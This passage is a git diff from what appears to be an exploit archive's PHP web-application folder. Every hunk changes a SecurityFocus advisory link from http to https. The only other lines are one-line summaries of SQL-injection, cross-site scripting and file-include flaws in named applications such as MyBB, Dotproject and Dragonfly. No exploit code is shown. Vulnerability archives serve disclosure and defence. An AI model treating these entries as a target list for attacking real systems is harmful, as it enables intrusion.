http://www.securityfocus.com/bid/16538/info +source: https://www.securityfocus.com/bid/16538/info MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27170.txt b/exploits/php/webapps/27170.txt index f8f588f16..645ca363a 100644 --- a/exploits/php/webapps/27170.txt +++ b/exploits/php/webapps/27170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16547/info +source: https://www.securityfocus.com/bid/16547/info The vwdev application is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27172.txt b/exploits/php/webapps/27172.txt index f76a7baff..f4809c114 100644 --- a/exploits/php/webapps/27172.txt +++ b/exploits/php/webapps/27172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16556/info +source: https://www.securityfocus.com/bid/16556/info SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27173.txt b/exploits/php/webapps/27173.txt index 2c3e310c2..13ec23a62 100644 --- a/exploits/php/webapps/27173.txt +++ b/exploits/php/webapps/27173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16559/info +source: https://www.securityfocus.com/bid/16559/info CPAINT is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27175.php b/exploits/php/webapps/27175.php index dc94c1a1e..495703278 100644 --- a/exploits/php/webapps/27175.php +++ b/exploits/php/webapps/27175.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16567/info +source: https://www.securityfocus.com/bid/16567/info PwsPHP is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27176.txt b/exploits/php/webapps/27176.txt index 2876d5690..5d2fc334d 100644 --- a/exploits/php/webapps/27176.txt +++ b/exploits/php/webapps/27176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16573/info +source: https://www.securityfocus.com/bid/16573/info Papoo is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27183.txt b/exploits/php/webapps/27183.txt index 288a32ff8..9c7ba9159 100644 --- a/exploits/php/webapps/27183.txt +++ b/exploits/php/webapps/27183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16580/info +source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27184.txt b/exploits/php/webapps/27184.txt index 66870f746..e2edf90b8 100644 --- a/exploits/php/webapps/27184.txt +++ b/exploits/php/webapps/27184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27185.txt b/exploits/php/webapps/27185.txt index c0003078b..53fd77726 100644 --- a/exploits/php/webapps/27185.txt +++ b/exploits/php/webapps/27185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27186.txt b/exploits/php/webapps/27186.txt index 2dc445ef6..a7c24aebd 100644 --- a/exploits/php/webapps/27186.txt +++ b/exploits/php/webapps/27186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27192.txt b/exploits/php/webapps/27192.txt index 07add8f98..202527b10 100644 --- a/exploits/php/webapps/27192.txt +++ b/exploits/php/webapps/27192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27193.txt b/exploits/php/webapps/27193.txt index 79ddbdfa5..1f4171fef 100644 --- a/exploits/php/webapps/27193.txt +++ b/exploits/php/webapps/27193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27194.txt b/exploits/php/webapps/27194.txt index 002380ff9..741e5ae45 100644 --- a/exploits/php/webapps/27194.txt +++ b/exploits/php/webapps/27194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27195.txt b/exploits/php/webapps/27195.txt index 8a808ccfc..d3103edf5 100644 --- a/exploits/php/webapps/27195.txt +++ b/exploits/php/webapps/27195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27197.txt b/exploits/php/webapps/27197.txt index 24661328c..cc7147117 100644 --- a/exploits/php/webapps/27197.txt +++ b/exploits/php/webapps/27197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27198.txt b/exploits/php/webapps/27198.txt index 779adbb8b..48f66112a 100644 --- a/exploits/php/webapps/27198.txt +++ b/exploits/php/webapps/27198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27199.txt b/exploits/php/webapps/27199.txt index 48509e76d..385f47876 100644 --- a/exploits/php/webapps/27199.txt +++ b/exploits/php/webapps/27199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27200.txt b/exploits/php/webapps/27200.txt index 4275bd446..f0d600169 100644 --- a/exploits/php/webapps/27200.txt +++ b/exploits/php/webapps/27200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27201.txt b/exploits/php/webapps/27201.txt index d6c452a1e..34b92b9d7 100644 --- a/exploits/php/webapps/27201.txt +++ b/exploits/php/webapps/27201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16596/info +source: https://www.securityfocus.com/bid/16596/info Siteframe Beaumont is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27202.txt b/exploits/php/webapps/27202.txt index 27c8367a1..e1d658ec6 100644 --- a/exploits/php/webapps/27202.txt +++ b/exploits/php/webapps/27202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16598/info +source: https://www.securityfocus.com/bid/16598/info DB_eSession is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27204.html b/exploits/php/webapps/27204.html index 2162e715a..601f8c430 100644 --- a/exploits/php/webapps/27204.html +++ b/exploits/php/webapps/27204.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16600/info +source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities. diff --git a/exploits/php/webapps/27205.html b/exploits/php/webapps/27205.html index 867dd7898..f4444b84a 100644 --- a/exploits/php/webapps/27205.html +++ b/exploits/php/webapps/27205.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16600/info +source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities. diff --git a/exploits/php/webapps/27206.txt b/exploits/php/webapps/27206.txt index 4b98d6f8d..a832f47c8 100644 --- a/exploits/php/webapps/27206.txt +++ b/exploits/php/webapps/27206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16604/info +source: https://www.securityfocus.com/bid/16604/info XMB Forum is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27207.txt b/exploits/php/webapps/27207.txt index 101aaba93..1c21b8ad2 100644 --- a/exploits/php/webapps/27207.txt +++ b/exploits/php/webapps/27207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16607/info +source: https://www.securityfocus.com/bid/16607/info Clever Copy is prone to multiple HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27208.txt b/exploits/php/webapps/27208.txt index 10e4b3f5f..03ee8cee2 100644 --- a/exploits/php/webapps/27208.txt +++ b/exploits/php/webapps/27208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16608/info +source: https://www.securityfocus.com/bid/16608/info PHPNuke is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27209.txt b/exploits/php/webapps/27209.txt index ad3b63b9a..1dce0819c 100644 --- a/exploits/php/webapps/27209.txt +++ b/exploits/php/webapps/27209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16615/info +source: https://www.securityfocus.com/bid/16615/info Gastebuch is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27213.txt b/exploits/php/webapps/27213.txt index 65e2de613..be1e5d797 100644 --- a/exploits/php/webapps/27213.txt +++ b/exploits/php/webapps/27213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16638/info +source: https://www.securityfocus.com/bid/16638/info QwikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27214.txt b/exploits/php/webapps/27214.txt index df79c13e4..8892ad03a 100644 --- a/exploits/php/webapps/27214.txt +++ b/exploits/php/webapps/27214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16642/info +source: https://www.securityfocus.com/bid/16642/info PHP Classifieds is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27215.txt b/exploits/php/webapps/27215.txt index 0fc978123..bc4ce7cf0 100644 --- a/exploits/php/webapps/27215.txt +++ b/exploits/php/webapps/27215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16647/info +source: https://www.securityfocus.com/bid/16647/info sNews is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27216.txt b/exploits/php/webapps/27216.txt index 7bb37f1a6..db4b6d8ef 100644 --- a/exploits/php/webapps/27216.txt +++ b/exploits/php/webapps/27216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16647/info +source: https://www.securityfocus.com/bid/16647/info sNews is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27217.txt b/exploits/php/webapps/27217.txt index ee11bea64..7ab4eafef 100644 --- a/exploits/php/webapps/27217.txt +++ b/exploits/php/webapps/27217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27218.txt b/exploits/php/webapps/27218.txt index 6f90d0d60..7dbb2d670 100644 --- a/exploits/php/webapps/27218.txt +++ b/exploits/php/webapps/27218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27219.txt b/exploits/php/webapps/27219.txt index 0a0709950..09ac07dc9 100644 --- a/exploits/php/webapps/27219.txt +++ b/exploits/php/webapps/27219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27220.txt b/exploits/php/webapps/27220.txt index e9fc5798f..1b5def7c2 100644 --- a/exploits/php/webapps/27220.txt +++ b/exploits/php/webapps/27220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27221.txt b/exploits/php/webapps/27221.txt index 328ad84d4..8721b8d9a 100644 --- a/exploits/php/webapps/27221.txt +++ b/exploits/php/webapps/27221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27222.txt b/exploits/php/webapps/27222.txt index 8e23f00fd..71043ee47 100644 --- a/exploits/php/webapps/27222.txt +++ b/exploits/php/webapps/27222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27223.txt b/exploits/php/webapps/27223.txt index 7a3149f9e..a9d865ef0 100644 --- a/exploits/php/webapps/27223.txt +++ b/exploits/php/webapps/27223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27224.txt b/exploits/php/webapps/27224.txt index b6d394bae..3aa308fad 100644 --- a/exploits/php/webapps/27224.txt +++ b/exploits/php/webapps/27224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27225.txt b/exploits/php/webapps/27225.txt index 7fd3c28f5..a5539997a 100644 --- a/exploits/php/webapps/27225.txt +++ b/exploits/php/webapps/27225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27226.txt b/exploits/php/webapps/27226.txt index a2db81cd4..841dca513 100644 --- a/exploits/php/webapps/27226.txt +++ b/exploits/php/webapps/27226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16652/info +source: https://www.securityfocus.com/bid/16652/info RunCMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27227.txt b/exploits/php/webapps/27227.txt index b617f6c03..c966abb70 100644 --- a/exploits/php/webapps/27227.txt +++ b/exploits/php/webapps/27227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16656/info +source: https://www.securityfocus.com/bid/16656/info WordPress is prone to an HTML-injection vulnerability. diff --git a/exploits/php/webapps/27228.txt b/exploits/php/webapps/27228.txt index e268ad586..9cfffbe3b 100644 --- a/exploits/php/webapps/27228.txt +++ b/exploits/php/webapps/27228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16657/info +source: https://www.securityfocus.com/bid/16657/info Mantis is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27229.txt b/exploits/php/webapps/27229.txt index 0c732df0f..4989bfb77 100644 --- a/exploits/php/webapps/27229.txt +++ b/exploits/php/webapps/27229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16657/info +source: https://www.securityfocus.com/bid/16657/info Mantis is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27230.txt b/exploits/php/webapps/27230.txt index e81978c2d..405dee9c0 100644 --- a/exploits/php/webapps/27230.txt +++ b/exploits/php/webapps/27230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16659/info +source: https://www.securityfocus.com/bid/16659/info My Blog is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27236.txt b/exploits/php/webapps/27236.txt index 3f6e38587..623671656 100644 --- a/exploits/php/webapps/27236.txt +++ b/exploits/php/webapps/27236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16678/info +source: https://www.securityfocus.com/bid/16678/info MyBB is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27237.txt b/exploits/php/webapps/27237.txt index 9c98d094e..66317e73f 100644 --- a/exploits/php/webapps/27237.txt +++ b/exploits/php/webapps/27237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16680/info +source: https://www.securityfocus.com/bid/16680/info HTML::BBCode is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27238.php b/exploits/php/webapps/27238.php index a69923a9b..f6493bb6f 100644 --- a/exploits/php/webapps/27238.php +++ b/exploits/php/webapps/27238.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16682/info +source: https://www.securityfocus.com/bid/16682/info HostAdmin is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27239.txt b/exploits/php/webapps/27239.txt index de41f776a..5681c8b61 100644 --- a/exploits/php/webapps/27239.txt +++ b/exploits/php/webapps/27239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16684/info +source: https://www.securityfocus.com/bid/16684/info BirthSys is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27240.txt b/exploits/php/webapps/27240.txt index 9273f804b..3472814a2 100644 --- a/exploits/php/webapps/27240.txt +++ b/exploits/php/webapps/27240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16689/info +source: https://www.securityfocus.com/bid/16689/info MyBB is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27242.txt b/exploits/php/webapps/27242.txt index 3401a14db..f7d27a5d3 100644 --- a/exploits/php/webapps/27242.txt +++ b/exploits/php/webapps/27242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16692/info +source: https://www.securityfocus.com/bid/16692/info MyBB is prone to a cross-site scripting vulnerability.. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27243.txt b/exploits/php/webapps/27243.txt index 015facd93..ec61ead37 100644 --- a/exploits/php/webapps/27243.txt +++ b/exploits/php/webapps/27243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16695/info +source: https://www.securityfocus.com/bid/16695/info Siteframe Beaumont is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27245.txt b/exploits/php/webapps/27245.txt index 631b2ac2f..9f994c9a1 100644 --- a/exploits/php/webapps/27245.txt +++ b/exploits/php/webapps/27245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16706/info +source: https://www.securityfocus.com/bid/16706/info V-webmail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27247.txt b/exploits/php/webapps/27247.txt index 214548000..e0addc15d 100644 --- a/exploits/php/webapps/27247.txt +++ b/exploits/php/webapps/27247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16719/info +source: https://www.securityfocus.com/bid/16719/info The e107 content management system (CMS) Chatbox Plugin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27248.txt b/exploits/php/webapps/27248.txt index 6a316ff68..9c0681f98 100644 --- a/exploits/php/webapps/27248.txt +++ b/exploits/php/webapps/27248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16721/info +source: https://www.securityfocus.com/bid/16721/info Webpagecity 'WPC.easy' is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27249.html b/exploits/php/webapps/27249.html index da4c02e60..a472c6ff1 100644 --- a/exploits/php/webapps/27249.html +++ b/exploits/php/webapps/27249.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16722/info +source: https://www.securityfocus.com/bid/16722/info The CAPTCHA implementation of PHPNuke may be bypassed by remote attackers due to a design error. diff --git a/exploits/php/webapps/27250.txt b/exploits/php/webapps/27250.txt index 73a6bf03c..f21558f2e 100644 --- a/exploits/php/webapps/27250.txt +++ b/exploits/php/webapps/27250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16731/info +source: https://www.securityfocus.com/bid/16731/info Time Tracking Software is prone to an access-validation vulnerability. This issue is due the application's failure to limit access to administrative sections of the application. diff --git a/exploits/php/webapps/27251.txt b/exploits/php/webapps/27251.txt index 805f4d1b6..91ad69f18 100644 --- a/exploits/php/webapps/27251.txt +++ b/exploits/php/webapps/27251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16734/info +source: https://www.securityfocus.com/bid/16734/info Magic Calendar Lite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27252.txt b/exploits/php/webapps/27252.txt index 63cf1e3ce..75420a9b3 100644 --- a/exploits/php/webapps/27252.txt +++ b/exploits/php/webapps/27252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16740/info +source: https://www.securityfocus.com/bid/16740/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27254.txt b/exploits/php/webapps/27254.txt index 611e91f25..15059d726 100644 --- a/exploits/php/webapps/27254.txt +++ b/exploits/php/webapps/27254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16752/info +source: https://www.securityfocus.com/bid/16752/info PostNuke is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27255.txt b/exploits/php/webapps/27255.txt index 71818e77f..d566368fb 100644 --- a/exploits/php/webapps/27255.txt +++ b/exploits/php/webapps/27255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16752/info +source: https://www.securityfocus.com/bid/16752/info PostNuke is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27256.txt b/exploits/php/webapps/27256.txt index f59c99515..0311b0320 100644 --- a/exploits/php/webapps/27256.txt +++ b/exploits/php/webapps/27256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16769/info +source: https://www.securityfocus.com/bid/16769/info RunCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27259.txt b/exploits/php/webapps/27259.txt index 8da019e5d..cefe23413 100644 --- a/exploits/php/webapps/27259.txt +++ b/exploits/php/webapps/27259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16772/info +source: https://www.securityfocus.com/bid/16772/info Noah's Classifieds is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27260.txt b/exploits/php/webapps/27260.txt index 520b5e3fd..fd3d6ea80 100644 --- a/exploits/php/webapps/27260.txt +++ b/exploits/php/webapps/27260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16773/info +source: https://www.securityfocus.com/bid/16773/info Noah's Classifieds is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27261.txt b/exploits/php/webapps/27261.txt index 5d36665ee..b9f3329fc 100644 --- a/exploits/php/webapps/27261.txt +++ b/exploits/php/webapps/27261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16778/info +source: https://www.securityfocus.com/bid/16778/info Noah's Classifieds is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts. diff --git a/exploits/php/webapps/27262.txt b/exploits/php/webapps/27262.txt index f6addf3d5..51cf329a7 100644 --- a/exploits/php/webapps/27262.txt +++ b/exploits/php/webapps/27262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16780/info +source: https://www.securityfocus.com/bid/16780/info Noah's Classifieds is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/27263.txt b/exploits/php/webapps/27263.txt index 7ae10687a..39acb15f0 100644 --- a/exploits/php/webapps/27263.txt +++ b/exploits/php/webapps/27263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27264.txt b/exploits/php/webapps/27264.txt index b8999716c..613b8dea3 100644 --- a/exploits/php/webapps/27264.txt +++ b/exploits/php/webapps/27264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27265.txt b/exploits/php/webapps/27265.txt index 12aa7be00..54b143a32 100644 --- a/exploits/php/webapps/27265.txt +++ b/exploits/php/webapps/27265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27266.txt b/exploits/php/webapps/27266.txt index e6ee70b45..aed058a16 100644 --- a/exploits/php/webapps/27266.txt +++ b/exploits/php/webapps/27266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27267.txt b/exploits/php/webapps/27267.txt index 1db3c23b2..96ec6bc28 100644 --- a/exploits/php/webapps/27267.txt +++ b/exploits/php/webapps/27267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27268.txt b/exploits/php/webapps/27268.txt index 3f555cf55..a252c2aad 100644 --- a/exploits/php/webapps/27268.txt +++ b/exploits/php/webapps/27268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27269.txt b/exploits/php/webapps/27269.txt index d84370975..ec82419d9 100644 --- a/exploits/php/webapps/27269.txt +++ b/exploits/php/webapps/27269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 